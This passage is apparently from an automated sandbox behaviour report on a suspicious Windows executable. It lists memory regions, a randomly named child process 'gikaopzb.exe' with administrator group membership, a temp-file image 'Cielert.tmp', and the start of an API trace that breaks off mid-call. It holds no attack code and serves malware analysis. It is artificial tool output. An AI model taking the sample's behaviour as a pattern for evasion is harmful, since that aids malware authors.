= 602 start_va = 0x7ffb61880000 end_va = 0x7ffb61940fff monitored = 0 entry_point = 0x7ffb618a0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 603 start_va = 0x7ffb60a00000 end_va = 0x7ffb60b0afff monitored = 0 entry_point = 0x7ffb60a22300 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 604 start_va = 0x7ffb557f0000 end_va = 0x7ffb55a63fff monitored = 0 entry_point = 0x7ffb55860400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 605 start_va = 0x7ffb5ecf0000 end_va = 0x7ffb5eda4fff monitored = 0 entry_point = 0x7ffb5ed322e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 606 start_va = 0x7ffb61820000 end_va = 0x7ffb61871fff monitored = 0 entry_point = 0x7ffb6182f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 607 start_va = 0x7ffb5f2d0000 end_va = 0x7ffb6082efff monitored = 0 entry_point = 0x7ffb5f4311f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 608 start_va = 0x7ffb5eca0000 end_va = 0x7ffb5ece2fff monitored = 0 entry_point = 0x7ffb5ecb4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 609 start_va = 0x7ffb5e560000 end_va = 0x7ffb5eba3fff monitored = 0 entry_point = 0x7ffb5e7264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 610 start_va = 0x7ffb5e2c0000 end_va = 0x7ffb5e2cefff monitored = 0 entry_point = 0x7ffb5e2c3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 611 start_va = 0x7ffb5e270000 end_va = 0x7ffb5e2bafff monitored = 0 entry_point = 0x7ffb5e2735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 612 start_va = 0x7ffb5e2d0000 end_va = 0x7ffb5e2e3fff monitored = 0 entry_point = 0x7ffb5e2d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 613 start_va = 0x7ffb5e300000 end_va = 0x7ffb5e385fff monitored = 0 entry_point = 0x7ffb5e30d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 614 start_va = 0x7ffb5ebb0000 end_va = 0x7ffb5ebc6fff monitored = 0 entry_point = 0x7ffb5ebb1390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 615 start_va = 0x7ffb57bc0000 end_va = 0x7ffb57bd6fff monitored = 0 entry_point = 0x7ffb57bc8bf0 region_type = mapped_file name = "feclient.dll" filename = "\\Windows\\System32\\feclient.dll" (normalized: "c:\\windows\\system32\\feclient.dll") Region: id = 616 start_va = 0x7ffb5c740000 end_va = 0x7ffb5c8c5fff monitored = 0 entry_point = 0x7ffb5c78d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 617 start_va = 0x7ffb510b0000 end_va = 0x7ffb51133fff monitored = 0 entry_point = 0x7ffb510c2830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 618 start_va = 0x7ffb539c0000 end_va = 0x7ffb53b77fff monitored = 0 entry_point = 0x7ffb53a2e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 619 start_va = 0x7ffb57c70000 end_va = 0x7ffb57c7bfff monitored = 0 entry_point = 0x7ffb57c71860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 620 start_va = 0x7ffb58ad0000 end_va = 0x7ffb58e51fff monitored = 0 entry_point = 0x7ffb58b21220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 621 start_va = 0x7ffb5e100000 end_va = 0x7ffb5e128fff monitored = 0 entry_point = 0x7ffb5e114530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 622 start_va = 0x480000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 623 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 624 start_va = 0x480000 end_va = 0x4b8fff monitored = 0 entry_point = 0x4812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 625 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 626 start_va = 0x660000 end_va = 0x7e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 627 start_va = 0x7ffb615a0000 end_va = 0x7ffb615dafff monitored = 0 entry_point = 0x7ffb615a12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 628 start_va = 0x7f0000 end_va = 0x970fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 629 start_va = 0x980000 end_va = 0x1d7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 630 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 631 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 632 start_va = 0x1f0000 end_va = 0x1f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "notepad.exe.mui" filename = "\\Windows\\System32\\en-US\\notepad.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\notepad.exe.mui") Region: id = 633 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 634 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 635 start_va = 0x1d80000 end_va = 0x1ec2fff monitored = 0 entry_point = 0x1da8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 636 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 637 start_va = 0x4b0000 end_va = 0x4b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 638 start_va = 0x7ffb5d0f0000 end_va = 0x7ffb5d121fff monitored = 0 entry_point = 0x7ffb5d102340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 639 start_va = 0x1d80000 end_va = 0x1e5cfff monitored = 0 entry_point = 0x1dde0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 640 start_va = 0x7ffb5cbf0000 end_va = 0x7ffb5cc85fff monitored = 0 entry_point = 0x7ffb5cc15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 641 start_va = 0x4d0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 642 start_va = 0x7ffb61430000 end_va = 0x7ffb61589fff monitored = 0 entry_point = 0x7ffb614738e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 643 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 644 start_va = 0x1d80000 end_va = 0x1e3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d80000" filename = "" Region: id = 645 start_va = 0x4a0000 end_va = 0x4a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 646 start_va = 0x7ffb5c200000 end_va = 0x7ffb5c221fff monitored = 0 entry_point = 0x7ffb5c201a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 647 start_va = 0x4d0000 end_va = 0x4d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 648 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 649 start_va = 0x1e40000 end_va = 0x2331fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 650 start_va = 0x2340000 end_va = 0x337ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 651 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 652 start_va = 0x7ffb615e0000 end_va = 0x7ffb61686fff monitored = 0 entry_point = 0x7ffb615eb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 653 start_va = 0x7ffb48310000 end_va = 0x7ffb483abfff monitored = 0 entry_point = 0x7ffb483696a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 654 start_va = 0x7ffb58e60000 end_va = 0x7ffb58f95fff monitored = 0 entry_point = 0x7ffb58e8f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 655 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 656 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 657 start_va = 0x3380000 end_va = 0x36b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 658 start_va = 0x36c0000 end_va = 0x37bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 659 start_va = 0x37c0000 end_va = 0x3a52fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037c0000" filename = "" Region: id = 660 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 661 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "m2rkel2wjz.txt" filename = "\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\m2rkel2wjz.txt") Region: id = 662 start_va = 0x7ffb612e0000 end_va = 0x7ffb61422fff monitored = 0 entry_point = 0x7ffb61308210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 663 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 664 start_va = 0x530000 end_va = 0x533fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 665 start_va = 0x3a60000 end_va = 0x3aa4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 666 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 667 start_va = 0x3ab0000 end_va = 0x3b3dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 668 start_va = 0x3b40000 end_va = 0x3f3afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Thread: id = 27 os_tid = 0xeec Thread: id = 30 os_tid = 0xefc Process: id = "5" image_name = "gikaopzb.exe" filename = "c:\\users\\rdhj0cnfevzx\\gikaopzb.exe" page_root = "0x25c5d000" os_pid = "0xf88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xde4" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 669 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 670 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 671 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 672 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 673 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 674 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 675 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 676 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 677 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "gikaopzb.exe" filename = "\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\gikaopzb.exe") Region: id = 678 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 679 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 680 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 681 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 682 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 683 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 689 start_va = 0x400000 end_va = 0x428fff monitored = 1 entry_point = 0x41d470 region_type = mapped_file name = "cielert.tmp" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Cielert.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cielert.tmp") Region: id = 690 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 691 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 692 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 693 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 694 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 695 start_va = 0x580000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 696 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 697 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 698 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 699 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 700 start_va = 0x430000 end_va = 0x4edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 701 start_va = 0x580000 end_va = 0x6fdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 702 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 703 start_va = 0x840000 end_va = 0x9befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 704 start_va = 0x9c0000 end_va = 0xcb9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 705 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 706 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 707 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 708 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 709 start_va = 0x750b0000 end_va = 0x7512afff monitored = 0 entry_point = 0x750ce970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 710 start_va = 0x76ff0000 end_va = 0x770adfff monitored = 0 entry_point = 0x77025630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 711 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 712 start_va = 0x840000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 713 start_va = 0x77360000 end_va = 0x773a3fff monitored = 0 entry_point = 0x77379d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 714 start_va = 0x74ff0000 end_va = 0x7509cfff monitored = 0 entry_point = 0x75004f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 715 start_va = 0x746c0000 end_va = 0x746ddfff monitored = 0 entry_point = 0x746cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 716 start_va = 0x746b0000 end_va = 0x746b9fff monitored = 0 entry_point = 0x746b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 717 start_va = 0x771d0000 end_va = 0x77227fff monitored = 0 entry_point = 0x772125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 718 start_va = 0x4f0000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 719 start_va = 0x4f0000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 720 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 721 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 722 start_va = 0x520000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 723 start_va = 0xcc0000 end_va = 0xddafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 1153 start_va = 0x680000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1154 start_va = 0x6a0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1155 start_va = 0x74cb0000 end_va = 0x74df6fff monitored = 0 entry_point = 0x74cc1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1156 start_va = 0x75130000 end_va = 0x7527efff monitored = 0 entry_point = 0x751e6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1157 start_va = 0x6c0000 end_va = 0x6e9fff monitored = 0 entry_point = 0x6c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1158 start_va = 0xde0000 end_va = 0xf67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 1159 start_va = 0x75450000 end_va = 0x7547afff monitored = 0 entry_point = 0x75455680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1160 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1161 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1162 start_va = 0xf70000 end_va = 0x10f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1163 start_va = 0x1100000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 1191 start_va = 0x6c0000 end_va = 0x6e8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1193 start_va = 0x520000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Thread: id = 31 os_tid = 0xf8c [0175.518] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x19f23c | out: HeapArray=0x19f23c*=0x740000) returned 0x1 [0175.528] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f1ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.530] NtCreateFile (in: FileHandle=0x19f20c, DesiredAccess=0x120089, ObjectAttributes=0x19f1d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f1f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f20c*=0x6c, IoStatusBlock=0x19f1f4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0175.539] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7427b0) returned 1 [0175.544] NtQueryInformationFile (in: FileHandle=0x6c, 